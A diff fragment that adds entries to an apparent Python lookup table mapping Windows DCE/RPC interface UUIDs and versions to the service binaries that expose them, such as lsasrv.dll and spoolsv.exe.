+b"\xd0\xd1\x33\x88\x5f\x96\x16\x42\xb3\xe9\xfb\xe5\x8c\xad\x31\x00\x01\x00": "SCardSvr.dll",
+b"\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a\x01\x00": "wkssvc.dll",
+b"\x38\x8d\x04\x7e\x08\xac\xf1\x4f\x8e\x6b\xf3\x5d\xba\xb8\x8d\x4a\x01\x00": "mqqm.dll",
+b"\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2\x04\x00": "ntdsai.dll",
+b"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88\x00\x00": "sfmsvc.exe",
+b"\xc5\x28\x47\x3c\xab\xf0\x8b\x44\xbd\xa1\x6c\xe0\x1e\xb0\xa6\xd6\x01\x00": "dhcpcsvc6.dll",
+b"\x36\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00": "rpcss.dll",
+b"\x54\x79\x26\x3d\xb7\xee\xd1\x11\xb9\x4e\x00\xc0\x4f\xa3\x08\x0d\x01\x00": "lserver.dll",
+b"\xbf\x09\x11\x81\xe1\xa4\xd1\x11\xab\x54\x00\xa0\xc9\x1e\x9b\x45\x01\x00": "WINS.EXE",
+b"\xd0\xbb\xf5\x7a\x63\x60\xd1\x11\xae\x2a\x00\x80\xc7\x5e\x4e\xc1\x00\x00": "irmon.dll",
+b"\x99\x1e\xb8\x12\x07\xf2\x4c\x4a\x85\xd3\x77\xb4\x2f\x76\xfd\x14\x01\x00": "seclogon.dll",
+b"\x6c\x5e\x64\x00\x9f\xfc\x0c\x4a\x98\x96\xf0\x0b\x66\x29\x77\x98\x01\x00": "icardagt.exe",
+b"\x9f\x2f\x5b\xb1\x3c\x90\x71\x46\x8d\xc0\x77\x2c\x54\x21\x40\x68\x01\x00": "pwmig.dll",
+b"\xa6\x95\x7d\x49\x27\x2d\xf5\x4b\x9b\xbd\xa6\x04\x69\x57\x13\x3c\x01\x00": "termsrv.dll",
+b"\xcb\x92\xbe\x5c\xbe\xf4\xc9\x45\x9f\xc9\x33\xe7\x3e\x55\x7b\x20\x01\x00": "lsasrv.dll",
+b"\xa1\x0f\x51\x69\x99\x2f\xeb\x4e\xa4\xff\xaf\x25\x9f\x0f\x97\x49\x01\x00": "wecsvc.dll",
+b"\x70\x5d\xfb\x8c\xa4\x31\xcf\x11\xa7\xd8\x00\x80\x5f\x48\xa1\x35\x03\x00": "smtpsvc.dll",
+b"\x46\x0d\x85\x77\x1d\x85\xb6\x43\x93\x98\x29\x01\x61\xf0\xca\xe6\x01\x00": "SeVA.dll",
+b"\xc3\x26\xf2\x76\x14\xec\x25\x43\x8a\x99\x6a\x46\x34\x84\x18\xaf\x01\x00": "winlogon.exe",
+b"\x84\x65\x0a\x0b\x0f\x9e\xcf\x11\xa3\xcf\x00\x80\x5f\x68\xcb\x1b\x01\x00": "rpcss.dll",
+b"\x15\x55\xf2\x11\x79\xc8\x0a\x40\x98\x9e\xb0\x74\xd5\xf0\x92\xfe\x01\x00": "lsm.exe",
+b"\xc0\xe0\x4d\x89\x55\x0d\xd3\x11\xa3\x22\x00\xc0\x4f\xa3\x21\xa1\x01\x00": "wininit.exe",
+b"\x00\xac\x0a\xf5\xf3\xc7\x8e\x42\xa0\x22\xa6\xb7\x1b\xfb\x9d\x43\x01\x00": "cryptsvc.dll",
+b"\xa5\x44\xb0\x30\x25\xa2\xf0\x43\xb3\xa4\xe0\x60\xdf\x91\xf9\xc1\x01\x00": "certprop.dll",
+b"\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab\x00\x00": "lsasrv.dll",
+b"\x49\x69\xe9\x98\x59\xbc\xf1\x47\x92\xd1\x8c\x25\xb4\x6f\x85\xc7\x01\x00": "wlanext.exe",
+b"\xb8\x61\xe5\xff\x15\xbf\xcf\x11\x8c\x5e\x08\x00\x2b\xb4\x96\x49\x02\x00": "clussvc.exe",
+b"\xb4\x59\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x01\x00": "ntfrs.exe",
+b"\xb4\x59\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x01\x01": "ntfrs.exe",
+b"\xa4\xc2\xab\x50\x4d\x57\xb3\x40\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x05\x00": "dns.exe",
+b"\xb9\x99\x3f\x87\x4d\x1b\x10\x99\xb7\xaa\x00\x04\x00\x7f\x07\x01\x00\x00": "ssmsrp70.dll",
+b"\x01\xc3\x53\xb2\xa2\x78\x70\x42\xa9\x1f\x66\x0d\xee\x06\x9f\x4c\x01\x00": "rdpcore.dll",
+b"\x94\x68\x71\x22\x8e\xfd\x62\x44\x97\x83\x09\xe6\xd9\x53\x1f\x16\x01\x00": "ubpm.dll",
+b"\xf6\xb8\x35\xd3\x31\xcb\xd0\x11\xb0\xf9\x00\x60\x97\xba\x4e\x54\x01\x00": "polagent.dll",
+b"\x64\x1d\x82\x0c\xfc\xa3\xd1\x11\xbb\x7a\x00\x80\xc7\x5e\x4e\xc1\x01\x00": "irftp.exe",
+b"\xb8\x4a\x9f\x4d\x1c\x7d\xcf\x11\x86\x1e\x00\x20\xaf\x6e\x7c\x57\x00\x00": "rpcss.dll",
+b"\xa8\x95\xee\x81\x2e\x88\x15\x46\x88\x8a\x53\x34\x4c\xa1\x49\xe4\x01\x00": "vpnikeapi.dll",
+b"\xfb\xee\x0c\x13\x66\xe4\xd1\x11\xb7\x8b\x00\xc0\x4f\xa3\x28\x83\x02\x00": "ismip.dll",
+b"\x72\xee\xf3\xc6\x7e\xce\xd1\x11\xb7\x1e\x00\xc0\x4f\xc3\x11\x1a\x01\x00": "rpcss.dll",
+b"\x9a\xf9\x1e\x20\xa0\x7f\x4c\x44\x93\x99\x19\xba\x84\xf1\x2a\x1a\x01\x00": "appinfo.dll",
+b"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88\x03\x00": "srvsvc.dll",
+b"\x72\xe4\x9f\x6d\xf1\x30\x08\x47\x8f\xa8\x67\x83\x62\xb9\x61\x55\x01\x00": "wimserv.exe",
+b"\xd4\xd7\x44\x7c\xd5\x31\x4c\x42\xbd\x5e\x2b\x3e\x1f\x32\x3d\x22\x01\x00": "ntdsai.dll",
+b"\x55\x1a\x20\x6f\x4d\xa2\x5f\x49\xaa\xc9\x2f\x4f\xce\x34\xdf\x99\x01\x00": "IPHLPAPI.DLL",
+b"\x32\x35\x0f\x30\xcc\x38\xd0\x11\xa3\xf0\x00\x20\xaf\x6b\x0a\xdd\x01\x02": "trkwks.dll",
+b"\x32\x35\x0f\x30\xcc\x38\xd0\x11\xa3\xf0\x00\x20\xaf\x6b\x0a\xdd\x01\x00": "trkwks.dll",
+b"\x60\xf4\x82\x4f\x21\x0e\xcf\x11\x90\x9e\x00\x80\x5f\x48\xa1\x35\x04\x00": "nntpsvc.dll",
+b"\x7d\xce\x54\x5f\x79\x5b\x75\x41\x85\x84\xcb\x65\x31\x3a\x0e\x98\x01\x00": "appinfo.dll",
+b"\xdc\x3f\x27\x82\x2a\xe3\xc3\x18\x3f\x78\x82\x79\x29\xdc\x23\xea\x00\x00": "wevtsvc.dll",
+b"\x3a\xcf\xe0\x16\x04\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x01\x00": "ntdsbsrv.dll",
+b"\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x01\x28\x92\x02\x01\x62\x00\x00": "browser.dll",
+b"\xd6\x09\x48\x48\x39\x42\x1b\x47\xb5\xbc\x61\xdf\x8c\x23\xac\x48\x01\x00": "lsm.exe",
+b"\xe8\x04\xe6\x58\xdb\x9a\x2e\x4d\xa4\x64\x3b\x06\x83\xfb\x14\x80\x01\x00": "appinfo.dll",
+b"\x57\x72\xd4\xa2\xf7\x12\xeb\x4b\x89\x81\x0e\xbf\xa9\x35\xc4\x07\x01\x00": "p2psvc.dll",
+b"\x1e\xdd\x5b\x6b\x8c\x52\x2c\x42\xaf\x8c\xa4\x07\x9b\xe4\xfe\x48\x01\x00": "FwRemoteSvr.dll",
+b"\x75\x21\xc8\x51\x4e\x84\x50\x47\xb0\xd8\xec\x25\x55\x55\xbc\x06\x01\x00": "SLsvc.exe",
+b"\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xac\x01\x00": "samsrv.dll",
+b"\xc0\x47\xdf\xb3\x5a\xa9\xcf\x11\xaa\x26\x00\xaa\x00\xc1\x48\xb9\x09\x00": "mspadmin.exe - Microsoft ISA Server",
+b"\x00\xac\x0a\xf5\xf3\xc7\x8e\x42\xa0\x22\xa6\xb7\x1b\xfb\x9d\x43\x01\x01": "cryptsvc.dll",
+b"\x65\x31\x0a\xea\x34\x48\xd2\x11\xa6\xf8\x00\xc0\x4f\xa3\x46\xcc\x04\x00": "FXSSVC.exe",
+b"\x33\xa2\x74\xd6\x29\x58\xdd\x49\x90\xf0\x60\xcf\x9c\xeb\x71\x29\x01\x00": "ipnathlp.dll",
+b"\xf7\xaf\xbe\xf6\x19\x1e\xbb\x4f\x9f\x8f\xb8\x9e\x20\x18\x33\x7c\x01\x00": "wevtsvc.dll",
+b"\x70\x0d\xec\xec\x03\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x02\x00": "ntdsbsrv.dll",
+b"\x7c\xda\x83\x4f\xe8\xd2\x11\x98\x07\x00\xc0\x4f\x8e\xc8\x50\x02\x00\x00": "sfc.dll",
+b"\x80\x92\xea\x46\xbf\x5b\x5e\x44\x83\x1d\x41\xd0\xf6\x0f\x50\x3a\x01\x00": "ifssvc.exe",
+b"\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03\x02\x00": "services.exe",
+b"\x66\x9f\x9b\x62\x6c\x55\xd1\x11\x8d\xd2\x00\xaa\x00\x4a\xbd\x5e\x03\x00": "sens.dll",
+b"\x1c\x02\x0c\xa0\xe2\x2b\xd2\x11\xb6\x78\x00\x00\xf8\x7a\x8f\x8e\x01\x00": "ntfrs.exe",
+b"\x3e\xca\x86\xc3\x61\x90\x72\x4a\x82\x1e\x49\x8d\x83\xbe\x18\x8f\x01\x01": "audiosrv.dll",
+b"\x6d\xa5\x6e\xe7\x3f\x45\xcf\x11\xbf\xec\x08\x00\x2b\xe2\x3f\x2f\x02\x01": "resrcmon.exe",
+b"\xe1\xbf\x72\x4a\x94\x92\xda\x11\xa7\x2b\x08\x00\x20\x0c\x9a\x66\x01\x00": "rdpinit.exe",
+b"\x7c\x5f\xc4\xa2\x32\x7d\xad\x46\x96\xf5\xad\xaf\xb4\x86\xbe\x74\x01\x00": "services.exe",
+b"\x01\x6b\x77\x45\x56\x59\x85\x44\x9f\x80\xf4\x28\xf7\xd6\x01\x29\x02\x00": "dnsrslvr.dll",
+b"\x96\x7b\x9b\x6c\xa8\x45\xca\x4c\x9e\xb3\xe2\x1c\xcf\x8b\x5a\x89\x01\x00": "umpo.dll",
+b"\x15\x04\x42\x9d\xfb\xb8\x4a\x4f\x8c\x53\x45\x02\xea\xd3\x0c\xa9\x01\x00": "PlaySndSrv.dll",
+b"\x50\x38\xcd\x15\xca\x28\xce\x11\xa4\xe8\x00\xaa\x00\x61\x16\xcb\x01\x00": "PeerDistSvc.dll",
+b"\x20\xe5\x98\xa3\x9a\xd5\xdd\x4b\xaa\x7a\x3c\x1e\x03\x03\xa5\x11\x01\x00": "IKEEXT.DLL",
+b"\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa\x03\x00": "rpcss.dll",
+b"\x00\x7c\xda\x83\x4f\xe8\xd2\x11\x98\x07\x00\xc0\x4f\x8e\xc8\x50\x02\x00": "sfc_os.dll",
+b"\xf2\xdc\x51\x4a\x3a\x5c\xd2\x4d\x84\xdb\xc3\x80\x2e\xe7\xf9\xb7\x01\x00": "ntdsai.dll",
+b"\x82\x06\xf7\x1f\x51\x0a\xe8\x30\x07\x6d\x74\x0b\xe8\xce\xe9\x8b\x01\x00": "taskcomp.dll",
+b"\x00\xb9\x99\x3f\x87\x4d\x1b\x10\x99\xb7\xaa\x00\x04\x00\x7f\x07\x01\x00": "ssmsrpc.dll - Microsoft SQL Server",
+b"\x20\x17\x82\x5b\x3b\xf6\xd0\x11\xaa\xd2\x00\xc0\x4f\xc3\x24\xdb\x01\x00": "dhcpssvc.dll",
+b"\x22\xc4\xa1\x4d\x3d\x94\xd1\x11\xac\xae\x00\xc0\x4f\xc2\xaa\x3f\x01\x00": "trksvr.dll",
+b"\x74\xe9\xa5\x1a\x82\x62\x8d\x4e\x9c\x96\x40\x18\x6e\x89\xd2\x80\x01\x00": "scss.exe",
+b"\x94\x73\x92\x1a\x2e\x35\x53\x45\xae\x3f\x7c\xf4\xaa\xfc\xa6\x20\x01\x00": "wdssrv.dll",
+b"\x66\xf6\x8c\x04\x42\xab\xb4\x42\x89\x75\x13\x57\x01\x8d\xec\xb3\x01\x00": "ws2_32.dll",
+b"\x3a\xcf\xe0\x16\x04\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x02\x00": "ntdsbsrv.dll",
+b"\x02\x00\x00\x00\x01\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x69\x01\x00": "kdcsvc.dll",
+b"\xb0\x52\x8e\x37\xa9\xc0\xcf\x11\x82\x2d\x00\xaa\x00\x51\xe4\x0f\x01\x00": "taskcomp.dll",
+b"\xe0\x6d\x7a\x8c\x8d\x78\xd0\x11\x9e\xdf\x44\x45\x53\x54\x00\x00\x02\x00": "wiaservc.dll",
+b"\x05\x81\xa7\x3c\xa3\xa3\x68\x4a\xb4\x58\x1a\x60\x6b\xab\x8f\xd6\x01\x00": "mpnotify.exe",
+b"\x2e\xa0\x8a\xb5\x84\x28\x97\x4e\x81\x76\x4e\xe0\x6d\x79\x41\x84\x01\x00": "sysmain.dll",
+b"\x95\x4f\x25\xd4\xc3\x08\xcc\x4f\xb2\xa6\x0b\x65\x13\x77\xa2\x9c\x01\x00": "wwansvc.dll",
+b"\x6e\x2c\xf4\xc3\xcc\xd4\x5a\x4e\x93\x8b\x9c\x5e\x8a\x5d\x8c\x2e\x01\x00": "wlanmsm.dll",
+b"\x53\x0c\x19\xf3\x0c\x4e\x1a\x49\xaa\xd3\x2a\x7c\xeb\x7e\x25\xd4\x01\x00": "vpnikeapi.dll",
+b"\x26\xc0\xe1\xac\x3f\x8b\x11\x47\x89\x18\xf3\x45\xd1\x7f\x5b\xff\x01\x00": "lsasrv.dll",
+b"\xc0\xc4\x55\xae\xce\x64\xdd\x11\xad\x8b\x08\x00\x20\x0c\x9a\x66\x01\x00": "bdesvc.dll",
+b"\xc4\x0c\x3c\xe3\x82\x04\x1a\x10\xbc\x0c\x02\x60\x8c\x6b\xa2\x18\x01\x00": "locator.exe",
+b"\x0e\x3b\x6c\x50\xd1\x4b\x56\x4c\x88\xc0\x49\xa2\x0e\xd4\xb5\x39\x01\x00": "milcore.dll",
+b"\x3e\x8e\xb0\x2e\x9f\x63\xba\x4f\x97\xb1\x14\xf8\x78\x96\x10\x76\x01\x00": "gpsvc.dll",
+b"\x66\x9f\x9b\x62\x6c\x55\xd1\x11\x8d\xd2\x00\xaa\x00\x4a\xbd\x5e\x02\x00": "sens.dll",
+b"\xb5\x6d\xac\xc9\xb7\x82\x55\x4e\xae\x8a\xe4\x64\xed\x7b\x42\x77\x01\x00": "sysntfy.dll",
+b"\x98\x46\xbc\xa0\xd7\xb8\x30\x43\xa2\x8f\x77\x09\xe1\x8b\x61\x08\x04\x00": "Sens.dll",
+b"\x1e\xc9\x31\x3f\x45\x25\x7b\x4b\x93\x11\x95\x29\xe8\xbf\xfe\xf6\x01\x00": "p2psvc.dll",
+b"\x3e\xca\x86\xc3\x61\x90\x72\x4a\x82\x1e\x49\x8d\x83\xbe\x18\x8f\x02\x00": "audiosrv.dll",
+b"\x3e\xca\x86\xc3\x61\x90\x72\x4a\x82\x1e\x49\x8d\x83\xbe\x18\x8f\x02\x02": "audiosrv.dll",
+b"\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0\x4f\xb6\xe6\xfc\x01\x00": "msgsvc.dll",
+b"\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x74\x53\x2d\x01\x00": "dhcpssvc.dll",
+b"\xb8\xd0\x48\xe2\x15\xbf\xcf\x11\x8c\x5e\x08\x00\x2b\xb4\x96\x49\x02\x00": "clussvc.exe",
+b"\x78\xad\xbc\x1c\x0b\xdf\x34\x49\xb5\x58\x87\x83\x9e\xa5\x01\xc9\x00\x00": "lsasrv.dll",
+b"\x87\x76\xcb\xc8\xd3\xe6\xd2\x11\xa9\x58\x00\xc0\x4f\x68\x2e\x16\x01\x00": "WebClnt.dll",
+b"\x88\xd4\x81\xc6\x50\xd8\xd0\x11\x8c\x52\x00\xc0\x4f\xd9\x0f\x7e\x01\x00": "lsasrv.dll",
+b"\x80\x35\x5b\x5b\xe0\xb0\xd1\x11\xb9\x2d\x00\x60\x08\x1e\x87\xf0\x01\x00": "mqqm.dll",
+b"\xf0\x09\x8f\xed\xb7\xce\x11\xbb\xd2\x00\x00\x1a\x18\x1c\xad\x00\x00\x00": "mprdim.dll",
+b"\xd8\x5d\xe6\x12\x7f\x88\xef\x41\x91\xbf\x8d\x81\x6c\x42\xc2\xe7\x01\x00": "winlogon.exe",
+b"\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0\x4f\xb6\x36\xfc\x01\x00": "msgsvc.dll",
+b"\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03\x01\x00": "regsvc.dll",
+b"\x03\xd7\xfd\x17\x27\x18\x34\x4e\x79\xd4\x24\xa5\x5c\x53\xbb\x37\x01\x00": "msgsvc.dll",
+b"\x1c\x95\x57\x33\xd1\xa1\xdb\x47\xa2\x78\xab\x94\x5d\x06\x3d\x03\x01\x00": "LBService.dll",
+b"\xab\xbe\x00\xc1\x3a\xd3\x4b\x4a\xbf\x23\xbb\xef\x46\x63\xd0\x17\x01\x00": "wcncsvc.dll",
+b"\xc4\xfc\x7b\x82\xb4\x38\xcd\x4a\x92\xe4\x21\xe1\x50\x6b\x85\xfb\x01\x00": "SLsvc.exe",
+b"\x00\xf0\x09\x8f\xed\xb7\xce\x11\xbb\xd2\x00\x00\x1a\x18\x1c\xad\x00\x00": "mprdim.dll",
+b"\x4b\xa0\x12\x72\x63\xb4\x2e\x40\x96\x49\x2b\xa4\x77\x39\x46\x76\x01\x00": "umrdp.dll",
+b"\x20\x65\x5f\x2f\x46\xca\x67\x10\xb3\x19\x00\xdd\x01\x06\x62\xda\x01\x00": "tapisrv.dll",
+b"\xa0\x9e\xc0\x69\x09\x4a\x1b\x10\xae\x4b\x08\x00\x2b\x34\x9a\x02\x00\x00": "ole32.dll",
+b"\xd0\x3f\x14\x88\x8d\xc2\x2b\x4b\x8f\xef\x8d\x88\x2f\x6a\x93\x90\x01\x00": "lsm.exe",
+b"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00": "rpcss.dll",
+b"\x6c\xfc\x79\xde\x6f\xdc\xc7\x43\xa4\x8e\x63\xbb\xc8\xd4\x00\x9d\x01\x00": "rdpclip.exe",
+b"\x41\x82\xb5\x68\x59\xc2\x03\x4f\xa2\xe5\xa2\x65\x1d\xcb\xc9\x30\x01\x00": "cryptsvc.dll",
+b"\x80\xa9\x88\x10\xe5\xea\xd0\x11\x8d\x9b\x00\xa0\x24\x53\xc3\x37\x01\x00": "mqqm.dll",
+b"\xcf\x0b\xa7\x7e\xaf\x48\x6a\x4f\x89\x68\x6a\x44\x07\x54\xd5\xfa\x01\x00": "nsisvc.dll",
+b"\xe0\xca\x02\xec\xe0\xb9\xd2\x11\xbe\x62\x00\x20\xaf\xed\xdf\x63\x01\x00": "mq1repl.dll",
+b"\xb3\x8b\x0b\x59\xf6\x4e\xa4\x4c\x83\xcf\xbe\x06\xc4\x07\x86\x74\x01\x00": "PSIService.exe",
+b"\xce\x9f\x75\x89\x25\x5a\x86\x40\x89\x67\xde\x12\xf3\x9a\x60\xb5\x01\x00": "tssdjet.dll",
+b"\x5d\x2c\x95\x25\x76\x79\xa1\x4a\xa3\xcb\xc3\x5f\x7a\xe7\x9d\x1b\x01\x00": "wlansvc.dll",
+b"\xc5\x41\x19\xdf\x89\xfe\x79\x4e\xbf\x10\x46\x36\x57\xac\xf4\x4d\x01\x00": "efssvc.dll",
+b"\xc1\xcd\x1a\x8f\x4d\x75\xeb\x43\x96\x29\xaa\x16\x20\x92\x8e\x65\x00\x00": "IMEPADSM.DLL",
+b"\xdf\x76\x49\x65\x98\x14\x56\x40\xa1\x5e\xcb\x4e\x87\x58\x4b\xd8\x01\x00": "emdmgmt.dll",
+b"\xe0\x42\xc7\x4f\x10\x4a\xcf\x11\x82\x73\x00\xaa\x00\x4a\xe6\x73\x03\x00": "dfssvc.exe",
+b"\xfa\xdb\x6e\x0b\x24\x4a\xc6\x4f\x8a\x23\x94\x2b\x1e\xca\x65\xd1\x01\x00": "spoolsv.exe",
+b"\xc8\xb7\xd4\x12\xd5\x77\xd1\x11\x8c\x24\x00\xc0\x4f\xa3\x08\x0d\x01\x00": "lserver.dll",
+b"\x44\xaf\x7d\x8c\xdc\xb6\xd1\x11\x9a\x4c\x00\x20\xaf\x6e\x7c\x57\x01\x00": "appmgmts.dll",
+b"\xae\x99\x86\x9b\x44\x0e\xb1\x47\x8e\x7f\x86\xa4\x61\xd7\xec\xdc\x00\x00": "rpcss.dll",
+b"\x84\x65\x0a\x0b\x0f\x9e\xcf\x11\xa3\xcf\x00\x80\x5f\x68\xcb\x1b\x01\x01": "rpcss.dll",
+b"\xa2\x9c\x14\x93\x3b\x97\xd1\x11\x8c\x39\x00\xc0\x4f\xb9\x84\xf9\x00\x00": "scecli.dll",
+b"\x7d\x25\x13\xfc\x67\x55\xea\x4d\x89\x8d\xc6\xf9\xc4\x84\x15\xa0\x01\x00": "mqqm.dll",
+b"\x82\x26\xb9\x2f\x99\x65\xdc\x42\xae\x13\xbd\x2c\xa8\x9b\xd1\x1c\x01\x00": "MPSSVC.dll",
+b"\x76\x22\x3a\x33\x00\x00\x00\x00\x0d\x00\x00\x80\x9c\x00\x00\x00\x03\x00": "rpcrt4.dll",
+b"\xf0\x0e\xd7\xd6\x3b\x0e\xcb\x11\xac\xc3\x08\x00\x2b\x1d\x29\xc4\x01\x00": "locator.exe",
+b"\xdd\x34\x91\x1a\x39\x7b\xba\x45\xad\x88\x44\xd0\x1c\xa4\x7f\x28\x01\x00": "mqqm.dll",
+b"\xfe\x95\x31\x9b\x03\xd6\xd1\x43\xa0\xd5\x90\x72\xd7\xcd\xe1\x22\x01\x00": "tssdjet.dll",
+b"\x55\x1a\x20\x6f\x4d\xa2\x5f\x49\xaa\xc9\x2f\x4f\xce\x34\xdf\x98\x01\x00": "iphlpsvc.dll",
+b"\x5f\x2e\x7e\x89\xf3\x93\x76\x43\x9c\x9c\xfd\x22\x77\x49\x5c\x27\x01\x00": "dfsrmig.exe",
+b"\x90\x2c\xfe\x98\x42\xa5\xd0\x11\xa4\xef\x00\xa0\xc9\x06\x29\x10\x01\x00": "advapi32.dll",
+b"\x0c\xc5\xad\x30\xbc\x5c\xce\x46\x9a\x0e\x91\x91\x47\x89\xe2\x3c\x01\x00": "nrpsrv.dll",
+b"\x1e\x24\x2f\x41\x2a\xc1\xce\x11\xab\xff\x00\x20\xaf\x6e\x7a\x17\x00\x02": "rpcss.dll",
+b"\xe6\x53\x3a\x9f\xb1\xcb\x54\x4e\x87\x8e\xaf\x9f\x82\x3a\xa3\xf1\x01\x00": "MpRtMon.dll",
+b"\xa8\xe5\xfc\x1d\x8a\xdd\x33\x4e\xaa\xce\xf6\x03\x92\x2f\xd9\xe7\x00\x01": "wpcsvc.dll",
+b"\xf0\x0e\xd7\xd6\x3b\x0e\xcb\x11\xac\xc3\x08\x00\x2b\x1d\x29\xc3\x01\x00": "locator.exe",
+b"\x46\xd7\xd0\xe3\xaf\xd2\xfd\x40\x8a\x7a\x0d\x70\x78\xbb\x70\x92\x01\x00": "qmgr.dll",
+b"\x5a\x23\xb5\xc6\x13\xe4\x1d\x48\x9a\xc8\x31\x68\x1b\x1f\xaa\xf5\x01\x01": "SCardSvr.dll",
+b"\x5a\x23\xb5\xc6\x13\xe4\x1d\x48\x9a\xc8\x31\x68\x1b\x1f\xaa\xf5\x01\x00": "SCardSvr.dll",
+b"\x69\x45\x81\x7d\xb3\x35\x50\x48\xbb\x32\x83\x03\x5f\xce\xbf\x6e\x01\x00": "ias.dll",
+b"\x41\xea\x25\x48\xe3\x51\x2a\x4c\x84\x06\x8f\x2d\x26\x98\x39\x5f\x01\x00": "userenv.dll",
+b"\xc4\xfe\xfc\x99\x60\x52\x1b\x10\xbb\xcb\x00\xaa\x00\x21\x34\x7a\x00\x00": "rpcss.dll",
+b"\xc5\x28\x47\x3c\xab\xf0\x8b\x44\xbd\xa1\x6c\xe0\x1e\xb0\xa6\xd5\x01\x00": "dhcpcsvc.dll",
+b"\xe0\x8e\x20\x41\x70\xe9\xd1\x11\x9b\x9e\x00\xe0\x2c\x06\x4c\x39\x01\x00": "mqqm.dll",
+b"\xbf\x7b\x40\xcb\x4f\xc1\xd9\x4c\x8f\x55\xcb\xb0\x81\x46\x59\x8c\x00\x00": "IMJPDCT.EXE",
+b"\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb\x01\x00": "netlogon.dll",
+b"\x30\x4c\xda\x83\x3a\xea\xcf\x11\x9c\xc1\x08\x00\x36\x01\xe5\x06\x01\x00": "nfsclnt.exe",
+b"\x1f\xa7\x37\x21\x5e\xbb\x29\x4e\x8e\x7e\x2e\x46\xa6\x68\x1d\xbf\x09\x00": "wspsrv.exe - Microsoft ISA Server",
+b"\x1e\x67\xe9\xc0\xc6\x33\x38\x44\x94\x64\x56\xb2\xe1\xb1\xc7\xb4\x01\x00": "wbiosrvc.dll",
+b"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00": "rpcrt4.dll",
+b"\x8b\x3c\xf1\x6a\x44\x08\x83\x4c\x90\x64\x18\x92\xba\x82\x55\x27\x01\x00": "tssdis.exe",
+b"\x55\x51\xd8\xec\x3a\xcc\x10\x4f\xaa\xd5\x9a\x9a\x2b\xf2\xef\x0c\x01\x00": "termsrv.dll",
+b"\xe8\x98\x8b\xbb\xdd\x84\xe7\x45\x9f\x34\xc3\xfb\x61\x55\xee\xed\x01\x00": "vaultsvc.dll",
+b"\x86\xb1\x49\xd0\x4f\x81\xd1\x11\x9a\x3c\x00\xc0\x4f\xc9\xb2\x32\x01\x00": "ntfrs.exe",
+b"\x5d\x2c\x95\x25\x76\x79\xa1\x4a\xa3\xcb\xc3\x5f\x7a\xe7\x9d\x1b\x01\x01": "wlansvc.dll",
+b"\x7f\x0b\xfe\x64\xf5\x9e\x53\x45\xa7\xdb\x9a\x19\x75\x77\x75\x54\x01\x00": "rpcss.dll",
+b"\x86\xd4\xdc\x68\x9e\x66\xd1\x11\xab\x0c\x00\xc0\x4f\xc2\xdc\xd2\x02\x00": "ismserv.exe",
+b"\xc3\x26\xf2\x76\x14\xec\x25\x43\x8a\x99\x6a\x46\x34\x84\x18\xae\x01\x00": "winlogon.exe",
+b"\x23\x05\x7a\xfd\x70\xdc\xdd\x43\x9b\x2e\x9c\x5e\xd4\x82\x25\xb1\x01\x00": "appinfo.dll",
+b"\x40\xfd\x2c\x34\x6c\x3c\xce\x11\xa8\x93\x08\x00\x2b\x2e\x9c\x6d\x00\x00": "llssrv.exe",
+b"\x84\xd8\xb6\x8f\x88\x23\xd0\x11\x8c\x35\x00\xc0\x4f\xda\x27\x95\x04\x01": "w32time.dll",
+b"\x9b\x06\x33\xae\xa8\xa2\xee\x46\xa2\x35\xdd\xfd\x33\x9b\xe2\x81\x01\x00": "spoolsv.exe",
+b"\x26\xb5\x55\x1d\x37\xc1\xc5\x46\xab\x79\x63\x8f\x2a\x68\xe8\x69\x01\x00": "rpcss.dll",
+b"\xa0\xaa\x17\x6e\x47\x1a\xd1\x11\x98\xbd\x00\x00\xf8\x75\x29\x2e\x02\x00": "clussvc.exe",
+b"\xdf\x5f\xe9\xbd\xe0\xee\xde\x45\x9e\x12\xe5\xa6\x1c\xd0\xd4\xfe\x01\x00": "termsrv.dll",
+b"\xac\xbe\x00\xc1\x3a\xd3\x4b\x4a\xbf\x23\xbb\xef\x46\x63\xd0\x17\x01\x00": "wcncsvc.dll",
+b"\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab\x01\x00": "spoolsv.exe",
+b"\x06\x50\x7b\x8a\x13\xcc\xdb\x11\x97\x05\x00\x50\x56\xc0\x00\x08\x01\x00": "appidsvc.dll",
+b"\x20\x60\xae\x91\x3c\x9e\xcf\x11\x8d\x7c\x00\xaa\x00\xc0\x91\xbe\x00\x00": "certsrv.exe",
+b"\x16\xbb\x74\x81\x1b\x57\x38\x4c\x83\x86\x11\x02\xb4\x49\x04\x4a\x01\x00": "p2psvc.dll",
